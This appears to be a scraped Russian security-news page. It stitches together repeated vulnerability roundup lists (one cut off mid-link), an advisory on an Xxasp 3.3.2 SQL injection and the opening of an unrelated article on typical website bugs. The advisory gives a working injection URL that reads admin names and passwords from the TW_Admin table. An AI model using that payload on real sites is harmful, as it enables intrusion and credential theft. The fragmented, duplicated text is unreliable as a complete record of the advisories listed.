Подборка уязвимостей
В данной подборке уязвимости:
» Insight Control Suite For Linux (ICE-LX) Cross Site Request Forgery (CSRF), (детали)
» SDS Parent Connect SQL Injection (детали)
» XSRF (CSRF) in ocPortal (детали)
» XSS vulnerability in LiSK CMS (детали)
» Smart Douran CMS Remote File Download (детали)
» Clear Text Storage of Password in CS-MARS v6.0.4 and Earlier (детали)
» PHP-Calendar “description” and “lastaction” Cross Site Scripting Vulnerabilities (детали)
» PHP-Calendar “description” and “lastaction” Cross Site Scripting Vulnerabilities (детали)
» XSS vulnerability in LiSK CMS (детали)
» NetCache URL DoS - Argentinian ISP (детали)
Подборка уязвимостей
В данной подборке уязвимости в веб приложениях:
* Trend micro - IWSVA / IWSS - Authorization module password leak ( детали )
* LedgerSMB Security Advisory: Multiple Vulnerabilities ( детали )
* CMS SQL Injection Vulnerabilities ( детали )
* Silverstripe <= v2.3.4: two XSS vulnerabilities ( детали )
* Vulnerability in SQL-Ledger ( детали )
* BMC PatrolAgent Version Logging Format String Vulnerability ( детали )
* ShareTronix 1.0.4 - HTML Injection Vulnerability ( детали )
* New phpgroupware packages fix several vulnerabilities ( детали )
* Dillo integer overflow ( детали )
* EMC Replication Manager Client Control Service Remove Code Execution Vulnerability ( детали )
Подборка уязвимостей
В данной подборке уязвимости в веб приложениях:
* Trend micro - IWSVA / IWSS - Authorization module password leak ( детали )
* LedgerSMB Security Advisory: Multiple Vulnerabilities ( детали )
* CMS SQL Injection Vulnerabilities ( детали )
* Silverstripe <= v2.3.4: two XSS vulnerabilities ( детали )
* Vulnerability in SQL-Ledger ( [url=http://securityvulns.ru/
Xxasp 3.3.2 SQL Injection
Уязвимость позволяет удаленному пользователю произвести SQL иньекцию
Демо:
# demo.link/disk/ShareList.asp?Action=Main&SearchType=SearchFileType&SearchCondition=rar' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,AdminName,AdminPwd,14,15,16,17 from TW_Admin where '1'='1
TOP5 Типичных багов
01
Причина львиной доли багов — это элементарная невнимательность разработчиков при чтении ТЗ. Эти баги достаточно легко обнаруживаются
и довольно быстро исправляются
02
На втором месте по популярности идут баги верстки, связанные с некорректным отображением страниц сайта в отличных от Internet Explorer'а браузерах. Эти баги связанны с тем, что у верстальщиков просто не хватает времени просмотреть сайт во всех браузерах. Такие баги тоже легко
обнаруживаются, но уже не так легко правятся.
